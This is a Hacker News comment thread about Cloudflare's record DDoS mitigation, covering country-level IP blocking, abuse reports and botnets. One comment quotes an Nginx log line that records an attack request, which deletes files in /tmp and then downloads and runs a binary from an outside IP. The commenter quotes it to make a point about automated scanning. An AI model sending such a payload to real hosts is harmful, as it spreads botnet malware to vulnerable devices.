Live data from Hacker News

Cloudflare mitigates record-breaking 71M request-per-second DDoS attack

blog.cloudflare.com

121–130 of 151 posts

Re: Cloudflare mitigates record-breaking 71M request-per-second DDoS attack

#121
post #45

Earlier quoted context omitted.

The startup I work for hasn't ever had issues with any of the things you mentioned. What line of business is this, do you sell weapons to Ukraine or some such? > absolutely first thing I do at every company and on every project is ask if I can [block various countries] For side projects?! Blows my mind. This feels like the 2020s version of what used to be in chain emails "don't pick up this phone number or they'll ea…

> The startup I work for hasn't ever had issues with any of the things you mentioned. What line of business is this, do you sell weapons to Ukraine or some such? Well, not directly,but this is the first time I was morally willing to work in parallel to the defense industry. My previous startups were fintech. The customer I had who was attacked by China was Slideshare. Ultimately they bent over for China, and blocked…

> I’ve been in the industry for over 30 years and I’ve seem some shit.

Then maybe you should reevaluate your cold war attitude on network security.

I hope your sites/companies/projects never get attacked by a hacker from an "evil" country that goes through the absolute minimum effort of tunneling through a VPN or botnet in the US...

Re: Cloudflare mitigates record-breaking 71M request-per-second DDoS attack

#122

Earlier quoted context omitted.

> Letting russia and china on the internet was a massive security mistake we should rectify. Internet is decentralized in nature. Even if you tried to undo that, what's stopping anyone from bridging a non-CN/RU Intranet to CN/RU-Intranet. More importantly: who is to decide that? Should now a US-based organization dictate who EU/JP/Africa can communicate with? Applying such decisions at such a low level will only resu…

> Applying such decisions at such a low level will only result in the balkanization of the Internet Are we not already there with states being able to dictate what is and isn't allowed?

We are, so arguably we don't need private entities joining in the wall building frenzy just yet.

Re: Cloudflare mitigates record-breaking 71M request-per-second DDoS attack

#123

Earlier quoted context omitted.

Wouldn't it be nice if all the ISPs got together and refused to route traffic from networks that ignored abuse complaints? I suppose that would put cloudflare and anyone else doing ddos mitigation out of business. When I worked at a small ISP and we would get complaints, we would block the user until we could reach them. Then let them online long enough to update their antivirus. I can't imagine Comcast committing to…

I'd love to see that, but I don't think it'd work because most people aren't capable enough to disinfect their machines and you can't just block their access to the internet. I expect locked down devices like cell phones and tablets to be less problematic in that regard (but maybe that's not true at all), so maybe the home-botnet-issue will resolve itself as more and more people stop using personal computers? I have…

> [...] maybe the home-botnet-issue will resolve itself as more and more people stop using personal computers?

Maybe – if there wasn't IoT/smart home devices...

Re: Cloudflare mitigates record-breaking 71M request-per-second DDoS attack

#124

The startup I work for blocks all of china, russia, belarus and serbian IP space, which saves us about $50kper month in bandwidth charges. The absolutely first thing I do at every company and on every project is ask if I can block russia, china and belarussian IP space, and add all of their ASNs to the bogon list if we run our own bgp. They are never customers to the businesses of the companies I work for, but they s…

Wouldn't it be nice if all the ISPs got together and refused to route traffic from networks that ignored abuse complaints? I suppose that would put cloudflare and anyone else doing ddos mitigation out of business. When I worked at a small ISP and we would get complaints, we would block the user until we could reach them. Then let them online long enough to update their antivirus. I can't imagine Comcast committing to…

>Wouldn't it be nice if all the ISPs got together and refused to route traffic from networks that ignored abuse complaints?

Jesus, this reads like a prequel to Black Mirror episode.

Re: Cloudflare mitigates record-breaking 71M request-per-second DDoS attack

#125
post #114

Earlier quoted context omitted.

Did you report it to Google/AWS? I feel like they would be proactive about removing malicious users, but whether expectations match reality is another question.

I did to Azure and Cloudflare. 0 responses. No one cares.

Disappointing! Thanks for the reply.

Re: Cloudflare mitigates record-breaking 71M request-per-second DDoS attack

#126
post #4

This just feels like a typical sales team fluff piece. I worked in this space, and constantly read articles of different providers claiming to have blocked the biggest attack ever. Some go by total bandwidth, some by pps, some by number of actors, and apparently some by rps. Not that it isn't impressive, still, but hardly seems newsworthy.

Somewhere in Akamai there's a group of network engineers laughing at these numbers I'm sure. Akamai just doesn't blog about every neat thing they do.

Re: Cloudflare mitigates record-breaking 71M request-per-second DDoS attack

#127

The startup I work for blocks all of china, russia, belarus and serbian IP space, which saves us about $50kper month in bandwidth charges. The absolutely first thing I do at every company and on every project is ask if I can block russia, china and belarussian IP space, and add all of their ASNs to the bogon list if we run our own bgp. They are never customers to the businesses of the companies I work for, but they s…

>Letting russia and china on the internet was a massive security mistake we should rectify.

As a Russian,comments like this make me feel less and less interested in being friendly with the (generalized) West. If I'll always be seen as "one of the bad guys" for the crime of being born in a country and not wanting to shit on everything about it, then why even bother acting any other way?

Re: Cloudflare mitigates record-breaking 71M request-per-second DDoS attack

#128
post #88
post #47

Earlier quoted context omitted.

The US' foreign policy is to disrupt and steal as well, even to allies (the NSA engaged in industrial espionage on the Germany company Siemens). Moreover, DDoS attacks orginating from the US are sometimes greater than Chinese originated attacks -- as recently as a year ago [1] Also don't forget that some of the sketchiest providers on the internet are American, who routinely ignore abuse reports. NameCheap's abuse re…

Hilarious. Someone said block China and Russia, and we have a long response "USA bad! China not as bad!". No mention of Russia, and the original poster probably has nothing to do with the US. Here's the thing, China and Russia are the wild west of the internet. Someone starts to DDoS a UK IP from the US, and it gets shut down hard and fast. Someone starts to DDoS from Russia or China, and reports are dropped on the f…

> Drop Russia, China, and even Brazil (whos network ops never ever ever respond to spam reports).

I don't mean to be presumptuous but what is the benefit of this. Do you spend all day stressing when you see

    112.250.109.154 - - [14/Feb/2023:00:00:18 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 404 153 "-" "Hello, world"
in your Nginx logs? Actual financial fraud occurs using US residential proxies. Automated scanning occurs in those countries because they have a bunch of cheap insecure routers and IoT devices. Writing angry abuse reports all day is misdirected because the scanning device is probably some hacked Hikvision camera, not a master hacker. You'd be better off trying to get the C2 shut down.

Re: Cloudflare mitigates record-breaking 71M request-per-second DDoS attack

#129
post #45

Earlier quoted context omitted.

The startup I work for hasn't ever had issues with any of the things you mentioned. What line of business is this, do you sell weapons to Ukraine or some such? > absolutely first thing I do at every company and on every project is ask if I can [block various countries] For side projects?! Blows my mind. This feels like the 2020s version of what used to be in chain emails "don't pick up this phone number or they'll ea…

> The startup I work for hasn't ever had issues with any of the things you mentioned. What line of business is this, do you sell weapons to Ukraine or some such? Well, not directly,but this is the first time I was morally willing to work in parallel to the defense industry. My previous startups were fintech. The customer I had who was attacked by China was Slideshare. Ultimately they bent over for China, and blocked…

> Setup an IPS on a server exposed to the net. Record all attacks for a month, then look up the IP addresses, then you will understand.

These "attacks" are automated scanners trying a bunch of SSH/Telnet credentials and five year old Netgear CVEs. Why are you worried about these? If you are vulnerable to them you have a serious problem because someone will try them from a BuyVM or Ecatel machine that is Western but more lenient towards scanning and then you will be compromised.

Re: Cloudflare mitigates record-breaking 71M request-per-second DDoS attack

#130

The startup I work for blocks all of china, russia, belarus and serbian IP space, which saves us about $50kper month in bandwidth charges. The absolutely first thing I do at every company and on every project is ask if I can block russia, china and belarussian IP space, and add all of their ASNs to the bogon list if we run our own bgp. They are never customers to the businesses of the companies I work for, but they s…

Wouldn't it be nice if all the ISPs got together and refused to route traffic from networks that ignored abuse complaints? I suppose that would put cloudflare and anyone else doing ddos mitigation out of business. When I worked at a small ISP and we would get complaints, we would block the user until we could reach them. Then let them online long enough to update their antivirus. I can't imagine Comcast committing to…

> Wouldn't it be nice if all the ISPs got together and refused to route traffic from networks that ignored abuse complaints?

Is port scanning abuse? I don't think so but some babies on mailing lists love to spend all of their time writing handwritten abuse letters about it.

Post reply on HN